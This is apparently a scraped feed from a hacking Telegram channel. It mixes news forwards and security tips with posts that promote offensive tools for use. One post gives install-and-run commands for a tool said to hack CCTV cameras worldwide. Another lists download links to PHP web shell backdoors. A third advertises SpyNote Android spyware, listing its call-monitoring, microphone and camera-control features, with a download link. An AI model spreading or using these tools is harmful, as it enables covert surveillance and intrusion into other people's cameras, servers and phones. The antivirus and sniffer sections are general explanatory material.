UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.5K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘This program needs to hack IP cameras CCTV in the world. For setup you need to write these commands in #termux

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½:

1) apt-get install python3

2) apt-get install git

3) git clone https://github.com/yan4ikyt/webhack

4) cd webhack

5) pip3 install requests

6) python3 WebHack.py

7) choose option

#fastTips
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Big List Of Public Resources For Intelligence (OSINT) .pdf
426.9 KB

Big List Of Public Resources For Intelligence (OSINT)
#full list #requested
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘PHP #Shell new list :

* [Simple Shell](https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/php/simple-shell.php)

* [B374K Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/b374k.php)

* [C99 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/c99.php)

* [R57 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/r57.php)

* [Wso Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wso.php)

* [0byt3m1n1 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/0byt3m1n1.php)

* [Alfa Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/alfa.php)

* [AK-47 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/ak47shell.php)

* [Indoxploit Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/indoxploit.php)

* [Marion001 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/ak47shell.php)

* [Mini Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/mini.php)

* [p0wny-shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/p0wny-shell.php)

* [Sadrazam Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/sadrazam.php)

* [Webadmin Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/webadmin.php)

* [Wordpress Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wordpress.php)

* [LazyShell](https://github.com/joeylane/Lazyshell.php/blob/master/lazyshell.php)

βœ…top git
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘What can SpyNote do?

SpyNote is actually a tool used to create Android malicious programs. Recently, it has been particularly popular in many malicious program forums. It has some quite attractive features:


Β· No need to obtain system root permissions;

Β· Monitor the call;

Β· Steal contacts and information data;

Β· Record sound through microphone;

Β· Malicious calls;

Β· Install malicious applications;

Β· Obtain the IMEI code, WiFi MAC address, and wireless network operator details of the mobile phone;

Β· Get ​​the latest GPS location information of the device;

Β· Control the camera

πŸ¦‘DOWNLOAD APK https://github.com/cymilad/SpyNote

enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
The EU may delay the tech giant 's inquiry into data misuse in the Twitter case #international
Forwarded from UNDERCODE NEWS
Google introduced security measures seven hours after it revealed weakness in Gmail
Forwarded from UNDERCODE NEWS
campus tv hacked|The school campus TV station issued a statement saying that the youtube account was hacked
#cyberAttacks
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Steps to crack BAT batch source code in pseudo EXE:

1) First of all, double-click the program to run, do not close, some programs will KillSelf when they are closed;

2) Secondly, cd %temp% under CMD. At the beginning, I used dir *.bat and did not find it. At this time, you have to think that it may be a .cmd file, so you can try dir *.cmd, but there is no result;

3) γ€€γ€€Finally, copy the found BAT and right-click "Edit" to see the source code. The source code is as follows:


@echo off
title [One-key clearing of print tasks] BY: wnsdt
color 2f
echo.&echo.&echo.
echo Description (2011.10.11):
echo.&echo.
echo This tool can quickly clear unresponsive printing tasks and solve problems that cannot be printed problem!
echo.
echo If you connect to a printer shared on the network, please run this tool on that computer!
echo.&echo.
echo --------------------------------------------- -------------------
echo.
Echo leave a message on Weibo if there is a problem <a href="http://t.qq.com/wnsdt_kk">http:// t.qq.com/wnsdt_kk</a>
echo.&echo.&echo.&echo.&echo.&echo.
echo Press any key to start, exit, please close
pause>nul 2>nul
cls
echo.&echo.&echo.&echo.&echo. &echo.
echo will be cleaned up later, please print again...

net stop spooler>nul 2>nul
del %systemroot%\System32\spool\PRINTERS\*.* /q /s /f>nul 2>nul
sc config spooler start= auto>nul 2>nul
net start spooler>nul 2 >nul
exit


Written @UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#fastTips full webHacking via windows :
The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½:

1) download https://www.zaproxy.org/download/

2) run the setup

3) use for learn

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Eight basic principles to stay away from viruses:

1. Establish good security habits. For example: Do not open some emails and attachments of unknown origin, do not go to some unknown websites, do not execute software that is downloaded from the Internet without anti-virus treatment, etc. These necessary habits will make you The computer is more secure.

2. Turn off or delete unnecessary services in the system . By default, many operating systems will install some auxiliary services, such as FTP client, Telnet, and Web server. These services provide convenience for attackers, but are not of much use to users. If they are deleted, the possibility of being attacked can be greatly reduced.

3. Update security patches frequently. According to statistics, 80% of network viruses spread through system security vulnerabilities , such as Worm King, Shockwave, Sasser, etc., so we should regularly download the latest security patches from the Microsoft website to prevent Before it happens. γ€€γ€€

4. Using complex passwords Many network viruses attack the system by guessing simple passwords. Therefore, using complex passwords will greatly improve the security of the computer.

5. Quickly isolate the infected computer. When your computer finds a virus or abnormality, you should disconnect it immediately to prevent the computer from being infected more or becoming a source of transmission and infecting other computers again.

6. Know some virus knowledge so that you can discover new viruses in time and take corresponding measures to protect your computer from virus damage at critical moments. If you can understand some registry knowledge, you can regularly check whether there are suspicious keys in the registry's self-starting items; if you understand some memory knowledge, you can often check whether there are suspicious programs in the memory.

7. It is best to install professional anti-virus software for comprehensive monitoring. With the increasing number of viruses today, using anti-virus software for anti-virus is an increasingly economical choice. However, after installing anti-virus software, users should frequently upgrade and change some The main monitoring is often opened (such as mail monitoring), memory monitoring, etc., and problems should be reported, so as to truly protect the security of the computer.

8. Users should also install personal firewall software to prevent hacking. Due to the development of the Internet, hacker attacks on users’ computers are becoming more and more serious. Many network viruses use hackers to attack users’ computers. Therefore, users should also install Personal firewall software, set the security level to medium or high, so as to effectively prevent hacker attacks on the network.


@undercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Usually the content that sniffer cares about can be divided into the following categories:

1. Password
I think this is the reason for the vast majority of illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may make the intruder try to figure out your algorithm while eating skewers at home.

2. Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent online.

3. Peeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.

4. Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection.

> This information will pose a great harm to network security after being held by an illegal intruder. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a future article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the future problems will be much bigger.

@undercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁